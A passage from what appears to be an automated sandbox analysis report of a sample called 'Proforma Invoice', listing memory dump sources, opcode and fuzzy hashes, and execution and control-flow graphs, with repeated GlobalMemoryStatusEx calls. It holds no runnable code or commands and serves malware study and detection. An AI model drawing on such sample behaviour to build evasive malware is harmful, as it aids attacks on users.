                                                                                                  • Instruction Fuzzy Hash: 81E1EA74E041198FDB14DFA9D5809AEBBF2FF89304F24C15AE814A7366D771A941CF60
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1689858694.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_50b0000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 27460800da70e0611bb211d154fba11922ef79a5964f8bebf10f6e272b1a86d8
                                                                                                  • Instruction ID: 6ae67c0ecac61d5eff48b6535f32a783053bd5ef2ffe70e5c40d6ecea5adfa0b
                                                                                                  • Opcode Fuzzy Hash: 27460800da70e0611bb211d154fba11922ef79a5964f8bebf10f6e272b1a86d8
                                                                                                  • Instruction Fuzzy Hash: 82E10B74E002198FDB14DFA9D5809AEFBF2FF89304F24816AD815AB356D771A942CF60
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1689858694.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_50b0000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7df6c0431f4cfae3151443b64c3c9f7d15065ca8a70c25453a5c9a1231206671
                                                                                                  • Instruction ID: ffbd94fafe74c374e06d0cbfd6812feb7be09f93758ebd62d2b6da53b52be7c3
                                                                                                  • Opcode Fuzzy Hash: 7df6c0431f4cfae3151443b64c3c9f7d15065ca8a70c25453a5c9a1231206671
                                                                                                  • Instruction Fuzzy Hash: EE512A75E042198BDB14CFA9D5809EEBBF2FF89314F24816AD818A7216D7315A42CFA1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1689858694.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_50b0000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 634e0c93bd3b9315816785b5be91119925629b32fe4d45b9f3f3a72f912aeb41
                                                                                                  • Instruction ID: 7506e43dc7dacb2e0d97fd278ff70f2e0fe0ec3d27b6f496481c07d64cbfc575
                                                                                                  • Opcode Fuzzy Hash: 634e0c93bd3b9315816785b5be91119925629b32fe4d45b9f3f3a72f912aeb41
                                                                                                  • Instruction Fuzzy Hash: FF511C74E042198BDB14CFA9D9809AEBBF2FF89304F24C16AD818A7356D7315A42CF61
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1689858694.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_50b0000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9dbcdcc6e16d17f49ea2bd14607c62a98884defe65cab27a95f1dfcde82b9e4a
                                                                                                  • Instruction ID: fa8e817e21807b9858637bc8c6f43d2e6a24a236f77c2ba32025fadb60280275
                                                                                                  • Opcode Fuzzy Hash: 9dbcdcc6e16d17f49ea2bd14607c62a98884defe65cab27a95f1dfcde82b9e4a
                                                                                                  • Instruction Fuzzy Hash: A851FA74E042198FDB14CFA9D5809AEBBF2FF89304F24C16AD418A7356D7319A46CF61
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1690859952.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_6ec0000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: fbaff079f0710782dcb81f7cb1d727938ee0eaf523d38a4b3947337e9085a51e
                                                                                                  • Instruction ID: 51087dd3b79ebd1e1e7219cacba0929537ff8fa9e46d90620481451e11497883
                                                                                                  • Opcode Fuzzy Hash: fbaff079f0710782dcb81f7cb1d727938ee0eaf523d38a4b3947337e9085a51e
                                                                                                  • Instruction Fuzzy Hash: 36419E71D05B548FEB59CF6B8D4069AFBF3AFC9210F18C1FAD44CAA265DA3409468F11
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1690859952.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_6ec0000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f30e336964d90b75ec13318d280be74c87a4cf5a48fae8e5dee35058e84508f1
                                                                                                  • Instruction ID: 2b3a70d5238d26db720c21d69c6257a58adeca08578d06bb0ae06317f5a704a5
                                                                                                  • Opcode Fuzzy Hash: f30e336964d90b75ec13318d280be74c87a4cf5a48fae8e5dee35058e84508f1
                                                                                                  • Instruction Fuzzy Hash: 9C415F71D01B188BEB68CF6B8D4079AFAF3BFC9211F14D1BAD40CA6255DB7019868F11
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:8.1%
                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                  Signature Coverage:0%
                                                                                                  Total number of Nodes:59
                                                                                                  Total number of Limit Nodes:9
                                                                                                  execution_graph 41423 13cfef8 41424 13cff20 41423->41424 41425 13cff90 41424->41425 41427 6c2fee0 41424->41427 41428 6c2feea 41427->41428 41430 6c2fcb1 41427->41430 41428->41425 41429 6c2fde2 41429->41425 41430->41429 41434 13ceb10 41430->41434 41438 13ceb00 41430->41438 41431 6c2fd60 41431->41425 41442 13ceb48 41434->41442 41452 13ceb39 41434->41452 41435 13ceb1e 41435->41431 41439 13ceb1e 41438->41439 41440 13ceb48 3 API calls 41438->41440 41441 13ceb39 3 API calls 41438->41441 41439->41431 41440->41439 41441->41439 41443 13ceb7d 41442->41443 41444 13ceb55 41442->41444 41449 13ceb48 2 API calls 41443->41449 41451 13ceb39 2 API calls 41443->41451 41462 13cebd8 41443->41462 41444->41435 41445 13ceb9a 41446 13ceb9e 41445->41446 41447 13cec66 GlobalMemoryStatusEx 41445->41447 41446->41435 41448 13cec96 41447->41448 41448->41435 41449->41445 41451->41445 41453 13ceb7d 41452->41453 41454 13ceb55 41452->41454 41459 13ceb48 2 API calls 41453->41459 41460 13cebd8 GlobalMemoryStatusEx 41453->41460 41461 13ceb39 2 API calls 41453->41461 41454->41435 41455 13ceb9a 41456 13ceb9e 41455->41456 41457 13cec66 GlobalMemoryStatusEx 41455->41457 41456->41435 41458 13cec96 41457->41458 41458->41435 41459->41455 41460->41455 41461->41455 41463 13cebfc 41462->41463 41464 13cec03 41463->41464 41465 13cec66 GlobalMemoryStatusEx 41463->41465 41464->41445 41466 13cec96 41465->41466 41466->41445 41467 13c0848 41468 13c084e 41467->41468 41469 13c091b 41468->41469 41471 13c1380 41468->41471 41473 13c1396 41471->41473 41472 13c1480 41472->41468 41473->41472 41475 13c7eb0 41473->41475 41477 13c7eba 41475->41477 41476 13c7ed4 41476->41473 41477->41476 41480 6c2fa32 41477->41480 41486 6c2fa40 41477->41486 41481 6c2fa55 41480->41481 41482 6c2fc6a 41481->41482 41483 6c2fee0 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 41481->41483 41484 6c2fc90 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 41481->41484 41485 6c2fc81 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 41481->41485 41482->41476 41483->41481 41484->41481 41485->41481 41487 6c2fa55 41486->41487 41488 6c2fc6a 41487->41488 41489 6c2fc81 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 41487->41489 41490 6c2fee0 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 41487->41490 41491 6c2fc90 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 41487->41491 41488->41476 41489->41487 41490->41487 41491->41487
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                                  • API String ID: 0-2392861976
                                                                                                  • Opcode ID: 49d170dc25e3640044d82fb74c11275185098fb03fb9012a6b1f06eec31f0c9b
                                                                                                  • Instruction ID: c688b2a5b7f5f6bc47712605d7a086402a9c0ca8dd1f710574b99396442b93f8
                                                                                                  • Opcode Fuzzy Hash: 49d170dc25e3640044d82fb74c11275185098fb03fb9012a6b1f06eec31f0c9b
                                                                                                  • Instruction Fuzzy Hash: BED24C34E00216CFCB64DF68C584A9DB7B2FF85310F5485A9D849AB365DB38EE85CB81
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                                  • API String ID: 0-2392861976
                                                                                                  • Opcode ID: 69b56e82469c3061a671f25bb72fcea63c5b3f4f5c75a06852078313fb853453
                                                                                                  • Instruction ID: fd04431f7730cbde470e33f30ddd2b142950c096f925c0704eb841166331f5c6
                                                                                                  • Opcode Fuzzy Hash: 69b56e82469c3061a671f25bb72fcea63c5b3f4f5c75a06852078313fb853453
                                                                                                  • Instruction Fuzzy Hash: 4C52C330E1021A8FDF64DF69C58076DB7B2FB85318F24892AE809EB355DB35DD818B91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1760 6c27d90-6c27dae 1761 6c27db0-6c27db3 1760->1761 1762 6c27dd4-6c27dd7 1761->1762 1763 6c27db5-6c27dcf 1761->1763 1764 6c27dfa-6c27dfd 1762->1764 1765 6c27dd9-6c27df5 1762->1765 1763->1762 1767 6c27e14-6c27e17 1764->1767 1768 6c27dff-6c27e0d 1764->1768 1765->1764 1769 6c27e24-6c27e26 1767->1769 1770 6c27e19-6c27e23 1767->1770 1776 6c27e36-6c27e4c 1768->1776 1778 6c27e0f 1768->1778 1772 6c27e28 1769->1772 1773 6c27e2d-6c27e30 1769->1773 1772->1773 1773->1761 1773->1776 1780 6c27e52-6c27e5b 1776->1780 1781 6c28067-6c28071 1776->1781 1778->1767 1782 6c28072-6c280a7 1780->1782 1783 6c27e61-6c27e7e 1780->1783 1786 6c280a9-6c280ac 1782->1786 1792 6c28054-6c28061 1783->1792 1793 6c27e84-6c27eac 1783->1793 1788 6c280ae-6c280ca 1786->1788 1789 6c280cf-6c280d2 1786->1789 1788->1789 1790 6c280d8-6c280e4 1789->1790 1791 6c2817f-6c28182 1789->1791 1799 6c280ef-6c280f1 1790->1799 1795 6c283b7-6c283b9 1791->1795 1796 6c28188-6c28197 1791->1796 1792->1780 1792->1781 1793->1792 1813 6c27eb2-6c27ebb 1793->1813 1797 6c283c0-6c283c3 1795->1797 1798 6c283bb 1795->1798 1811 6c281b6-6c281fa 1796->1811 1812 6c28199-6c281b4 1796->1812 1797->1786 1802 6c283c9-6c283d2 1797->1802 1798->1797 1803 6c280f3-6c280f9 1799->1803 1804 6c28109-6c2810d 1799->1804 1807 6c280fb 1803->1807 1808 6c280fd-6c280ff 1803->1808 1809 6c2811b 1804->1809 1810 6c2810f-6c28119 1804->1810 1807->1804 1808->1804 1814 6c28120-6c28122 1809->1814 1810->1814 1820 6c28200-6c28211 1811->1820 1821 6c2838b-6c283a1 1811->1821 1812->1811 1813->1782 1818 6c27ec1-6c27edd 1813->1818 1815 6c28124-6c28127 1814->1815 1816 6c28139-6c28172 1814->1816 1815->1802 1816->1796 1840 6c28174-6c2817e 1816->1840 1826 6c28042-6c2804e 1818->1826 1827 6c27ee3-6c27f0d 1818->1827 1830 6c28376-6c28385 1820->1830 1831 6c28217-6c28234 1820->1831 1821->1795 1826->1792 1826->1813 1843 6c27f13-6c27f3b 1827->1843 1844 6c28038-6c2803d 1827->1844 1830->1820 1830->1821 1831->1830 1842 6c2823a-6c28330 call 6c26598 1831->1842 1893 6c28332-6c2833c 1842->1893 1894 6c2833e 1842->1894 1843->1844 1850 6c27f41-6c27f6f 1843->1850 1844->1826 1850->1844 1856 6c27f75-6c27f7e 1850->1856 1856->1844 1857 6c27f84-6c27fb6 1856->1857 1865 6c27fc1-6c27fdd 1857->1865 1866 6c27fb8-6c27fbc 1857->1866 1865->1826 1867 6c27fdf-6c28036 call 6c26598 1865->1867 1866->1844 1869 6c27fbe 1866->1869 1867->1826 1869->1865 1895 6c28343-6c28345 1893->1895 1894->1895 1895->1830 1896 6c28347-6c2834c 1895->1896 1897 6c2835a 1896->1897 1898 6c2834e-6c28358 1896->1898 1899 6c2835f-6c28361 1897->1899 1898->1899 1899->1830 1900 6c28363-6c2836f 1899->1900 1900->1830
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $^q$$^q
                                                                                                  • API String ID: 0-355816377
                                                                                                  • Opcode ID: fdc40123fb6db8a14e55b6b8d9e74734dcbfdd1f9f5269609707d5e6b830ba87
                                                                                                  • Instruction ID: bc4091927a4e56a1a9c0f4dfc058a0b276c201905fee3be532e548593baefe6f
                                                                                                  • Opcode Fuzzy Hash: fdc40123fb6db8a14e55b6b8d9e74734dcbfdd1f9f5269609707d5e6b830ba87
                                                                                                  • Instruction Fuzzy Hash: 1102D130B012168FDB54DF69D9906AEB7E2FF84304F148569D80AEB390DB35ED86CB91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 454347825f4b7672a86b00058a7690411098dbcd0d3eeb5334028d7a84afd0a4
                                                                                                  • Instruction ID: 775a7fff7bd3aec99bae71c026cdc32121cd653011c63ed8c9ec0349b8916ada
                                                                                                  • Opcode Fuzzy Hash: 454347825f4b7672a86b00058a7690411098dbcd0d3eeb5334028d7a84afd0a4
                                                                                                  • Instruction Fuzzy Hash: B7629F34A002168FDB54DB69D584BADB7F2FF88314F148469E81AEB350DB35ED46CBA0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 840dfd9b2a982bddd0e9c02a2ea0f319bb6245e441f46ce6b59df5126de88b84
                                                                                                  • Instruction ID: 57e5f81af57d43eaaa78c55c4d4a564db3982cb0e8c15e46fbaf83a12f38863f
                                                                                                  • Opcode Fuzzy Hash: 840dfd9b2a982bddd0e9c02a2ea0f319bb6245e441f46ce6b59df5126de88b84
                                                                                                  • Instruction Fuzzy Hash: 8922C175E102268FDB64DB68C4806AFB7F2EF89314F64846AD815EB340DB35DD42CB91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 0 6c2ace0-6c2acfe 1 6c2ad00-6c2ad03 0->1 2 6c2ad05-6c2ad0e 1->2 3 6c2ad1d-6c2ad20 1->3 4 6c2af17-6c2af28 2->4 5 6c2ad14-6c2ad18 2->5 6 6c2ad22-6c2ad26 3->6 7 6c2ad31-6c2ad34 3->7 17 6c2afa5-6c2afa7 4->17 18 6c2af2a-6c2af4e 4->18 5->3 8 6c2af0c-6c2af16 6->8 9 6c2ad2c 6->9 10 6c2ad36-6c2ad3b 7->10 11 6c2ad3e-6c2ad41 7->11 9->7 10->11 13 6c2ad43-6c2ad50 11->13 14 6c2ad55-6c2ad58 11->14 13->14 15 6c2ad5a-6c2ad76 14->15 16 6c2ad7b-6c2ad7e 14->16 15->16 22 6c2ad80-6c2ad93 16->22 23 6c2ad98-6c2ad9b 16->23 20 6c2afa8-6c2afab 17->20 21 6c2af50-6c2af53 18->21 25 6c2b214-6c2b216 20->25 26 6c2afad-6c2afaf 20->26 27 6c2af60-6c2af63 21->27 28 6c2af55-6c2af5f 21->28 22->23 29 6c2ada1-6c2ada4 23->29 30 6c2aefd-6c2af06 23->30 31 6c2b218 25->31 32 6c2b21d-6c2b220 25->32 33 6c2afb1-6c2afec 26->33 34 6c2af72-6c2af75 27->34 35 6c2af65 27->35 37 6c2ada6-6c2adaf 29->37 38 6c2adb4-6c2adb6 29->38 30->2 30->8 31->32 32->21 39 6c2b226-6c2b230 32->39 50 6c2aff2-6c2affe 33->50 51 6c2b1df-6c2b1f2 33->51 41 6c2af82-6c2af85 34->41 42 6c2af77-6c2af7b 34->42 126 6c2af65 call 6c2b242 35->126 127 6c2af65 call 6c2b248 35->127 37->38 43 6c2adb8 38->43 44 6c2adbd-6c2adc0 38->44 41->20 45 6c2af87-6c2afa3 41->45 42->33 49 6c2af7d 42->49 43->44 44->1 46 6c2adc6-6c2adea 44->46 45->17 60 6c2adf0-6c2adff 46->60 61 6c2aefa 46->61 48 6c2af6b-6c2af6d 48->34 49->41 58 6c2b000-6c2b019 50->58 59 6c2b01e-6c2b062 50->59 54 6c2b1f4 51->54 54->25 58->54 76 6c2b064-6c2b076 59->76 77 6c2b07e-6c2b0bd 59->77 65 6c2ae01-6c2ae07 60->65 66 6c2ae17-6c2ae52 call 6c26598 60->66 61->30 67 6c2ae0b-6c2ae0d 65->67 68 6c2ae09 65->68 84 6c2ae54-6c2ae5a 66->84 85 6c2ae6a-6c2ae81 66->85 67->66 68->66 76->77 81 6c2b0c3-6c2b19e call 6c26598 77->81 82 6c2b1a4-6c2b1b9 77->82 81->82 82->51 89 6c2ae5e-6c2ae60 84->89 90 6c2ae5c 84->90 96 6c2ae83-6c2ae89 85->96 97 6c2ae99-6c2aeaa 85->97 89->85 90->85 98 6c2ae8b 96->98 99 6c2ae8d-6c2ae8f 96->99 102 6c2aec2-6c2aef3 97->102 103 6c2aeac-6c2aeb2 97->103 98->97 99->97 102->61 104 6c2aeb6-6c2aeb8 103->104 105 6c2aeb4 103->105 104->102 105->102 126->48 127->48
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                  • API String ID: 0-3823777903
                                                                                                  • Opcode ID: 730da5fe8890968242d37adfd2a497250af8c0995fece36e016e5acfca9b2825
                                                                                                  • Instruction ID: f727e81c0fa671ce92bf32872d31b529ede60ab5d24d71b227f7bea8f193c928
                                                                                                  • Opcode Fuzzy Hash: 730da5fe8890968242d37adfd2a497250af8c0995fece36e016e5acfca9b2825
                                                                                                  • Instruction Fuzzy Hash: BCE18C30E1021A8FDB59DFA9D8806AEB7B2EF84704F20892DD805AB354DB35DD46CB91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 859 6c29160-6c29185 860 6c29187-6c2918a 859->860 861 6c29190-6c291a5 860->861 862 6c29a48-6c29a4b 860->862 868 6c291a7-6c291ad 861->868 869 6c291bd-6c291d3 861->869 863 6c29a71-6c29a73 862->863 864 6c29a4d-6c29a6c 862->864 865 6c29a75 863->865 866 6c29a7a-6c29a7d 863->866 864->863 865->866 866->860 871 6c29a83-6c29a8d 866->871 872 6c291b1-6c291b3 868->872 873 6c291af 868->873 876 6c291de-6c291e0 869->876 872->869 873->869 877 6c291e2-6c291e8 876->877 878 6c291f8-6c29269 876->878 879 6c291ea 877->879 880 6c291ec-6c291ee 877->880 889 6c29295-6c292b1 878->889 890 6c2926b-6c2928e 878->890 879->878 880->878 895 6c292b3-6c292d6 889->895 896 6c292dd-6c292f8 889->896 890->889 895->896 901 6c29323-6c2933e 896->901 902 6c292fa-6c2931c 896->902 907 6c29363-6c29371 901->907 908 6c29340-6c2935c 901->908 902->901 909 6c29373-6c2937c 907->909 910 6c29381-6c293fb 907->910 908->907 909->871 916 6c29448-6c2945d 910->916 917 6c293fd-6c2941b 910->917 916->862 921 6c29437-6c29446 917->921 922 6c2941d-6c2942c 917->922 921->916 921->917 922->921
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $^q$$^q$$^q$$^q
                                                                                                  • API String ID: 0-2125118731
                                                                                                  • Opcode ID: 4b6c4306a83339bbbadbc7c6612bef6e93e7556f1d5ec2dd1b8c6fffff4c4274
                                                                                                  • Instruction ID: 17575cdb97b9e68c9eb5095fd46bd7692ca586e7d4065191811d87e1d6a6a0ff
                                                                                                  • Opcode Fuzzy Hash: 4b6c4306a83339bbbadbc7c6612bef6e93e7556f1d5ec2dd1b8c6fffff4c4274
                                                                                                  • Instruction Fuzzy Hash: 27915F30F0021A9FDB54DF66D9507AEB3F6EFCA604F108569C809EB344EA75DD828B91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 925 6c2cf48-6c2cf63 926 6c2cf65-6c2cf68 925->926 927 6c2cfb1-6c2cfb4 926->927 928 6c2cf6a-6c2cfac 926->928 929 6c2cfb6-6c2cfd2 927->929 930 6c2cfd7-6c2cfda 927->930 928->927 929->930 931 6c2d023-6c2d026 930->931 932 6c2cfdc-6c2cfeb 930->932 934 6c2d035-6c2d038 931->934 935 6c2d028-6c2d02a 931->935 937 6c2cffa-6c2d006 932->937 938 6c2cfed-6c2cff2 932->938 941 6c2d081-6c2d084 934->941 942 6c2d03a-6c2d07c 934->942 939 6c2d030 935->939 940 6c2d2ef-6c2d2f8 935->940 944 6c2d965-6c2d99e 937->944 945 6c2d00c-6c2d01e 937->945 938->937 939->934 946 6c2d307-6c2d313 940->946 947 6c2d2fa-6c2d2ff 940->947 948 6c2d086-6c2d0c8 941->948 949 6c2d0cd-6c2d0d0 941->949 942->941 960 6c2d9a0-6c2d9a3 944->960 945->931 952 6c2d424-6c2d429 946->952 953 6c2d319-6c2d32d 946->953 947->946 948->949 956 6c2d0d2-6c2d114 949->956 957 6c2d119-6c2d11c 949->957 976 6c2d431 952->976 975 6c2d333-6c2d345 953->975 953->976 956->957 961 6c2d165-6c2d168 957->961 962 6c2d11e-6c2d160 957->962 967 6c2d9b2-6c2d9b5 960->967 968 6c2d9a5 960->968 969 6c2d1b1-6c2d1b4 961->969 970 6c2d16a-6c2d1ac 961->970 962->961 977 6c2d9b7-6c2d9d3 967->977 978 6c2d9d8-6c2d9db 967->978 1185 6c2d9a5 call 6c2dad0 968->1185 1186 6c2d9a5 call 6c2dabd 968->1186 972 6c2d1b6-6c2d1bb 969->972 973 6c2d1be-6c2d1c1 969->973 970->969 972->973 981 6c2d1c3-6c2d1d9 973->981 982 6c2d1de-6c2d1e1 973->982 1006 6c2d347-6c2d34d 975->1006 1007 6c2d369-6c2d36b 975->1007 983 6c2d434-6c2d440 976->983 977->978 986 6c2da0e-6c2da10 978->986 987 6c2d9dd-6c2da09 978->987 981->982 992 6c2d1e3-6c2d225 982->992 993 6c2d22a-6c2d22d 982->993 990 6c2d446-6c2d733 983->990 991 6c2d24a-6c2d259 983->991 984 6c2d9ab-6c2d9ad 984->967 996 6c2da12 986->996 997 6c2da17-6c2da1a 986->997 987->986 1138 6c2d95a-6c2d964 990->1138 1139 6c2d739-6c2d73f 990->1139 1009 6c2d25b-6c2d260 991->1009 1010 6c2d268-6c2d274 991->1010 992->993 1004 6c2d22f-6c2d231 993->1004 1005 6c2d23c-6c2d23f 993->1005 996->997 997->960 1003 6c2da1c-6c2da2b 997->1003 1035 6c2da92-6c2daa7 1003->1035 1036 6c2da2d-6c2da90 call 6c26598 1003->1036 1004->976 1015 6c2d237 1004->1015 1005->983 1016 6c2d245-6c2d248 1005->1016 1018 6c2d351-6c2d35d 1006->1018 1019 6c2d34f 1006->1019 1021 6c2d375-6c2d381 1007->1021 1009->1010 1010->944 1020 6c2d27a-6c2d28c 1010->1020 1015->1005 1016->991 1026 6c2d291-6c2d294 1016->1026 1027 6c2d35f-6c2d367 1018->1027 1019->1027 1020->1026 1047 6c2d383-6c2d38d 1021->1047 1048 6c2d38f 1021->1048 1030 6c2d296-6c2d2d8 1026->1030 1031 6c2d2dd-6c2d2df 1026->1031 1027->1021 1030->1031 1043 6c2d2e1 1031->1043 1044 6c2d2e6-6c2d2e9 1031->1044 1055 6c2daa8 1035->1055 1036->1035 1043->1044 1044->926 1044->940 1054 6c2d394-6c2d396 1047->1054 1048->1054 1054->976 1058 6c2d39c-6c2d3b8 call 6c26598 1054->1058 1055->1055 1072 6c2d3c7-6c2d3d3 1058->1072 1073 6c2d3ba-6c2d3bf 1058->1073 1072->952 1076 6c2d3d5-6c2d422 1072->1076 1073->1072 1076->976 1140 6c2d741-6c2d746 1139->1140 1141 6c2d74e-6c2d757 1139->1141 1140->1141 1141->944 1142 6c2d75d-6c2d770 1141->1142 1144 6c2d776-6c2d77c 1142->1144 1145 6c2d94a-6c2d954 1142->1145 1146 6c2d78b-6c2d794 1144->1146 1147 6c2d77e-6c2d783 1144->1147 1145->1138 1145->1139 1146->944 1148 6c2d79a-6c2d7bb 1146->1148 1147->1146 1151 6c2d7ca-6c2d7d3 1148->1151 1152 6c2d7bd-6c2d7c2 1148->1152 1151->944 1153 6c2d7d9-6c2d7f6 1151->1153 1152->1151 1153->1145 1156 6c2d7fc-6c2d802 1153->1156 1156->944 1157 6c2d808-6c2d821 1156->1157 1159 6c2d827-6c2d84e 1157->1159 1160 6c2d93d-6c2d944 1157->1160 1159->944 1163 6c2d854-6c2d85e 1159->1163 1160->1145 1160->1156 1163->944 1164 6c2d864-6c2d87b 1163->1164 1166 6c2d88a-6c2d8a5 1164->1166 1167 6c2d87d-6c2d888 1164->1167 1166->1160 1172 6c2d8ab-6c2d8c4 call 6c26598 1166->1172 1167->1166 1176 6c2d8d3-6c2d8dc 1172->1176 1177 6c2d8c6-6c2d8cb 1172->1177 1176->944 1178 6c2d8e2-6c2d936 1176->1178 1177->1176 1178->1160 1185->984 1186->984
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd
                                                                                                  Similarity
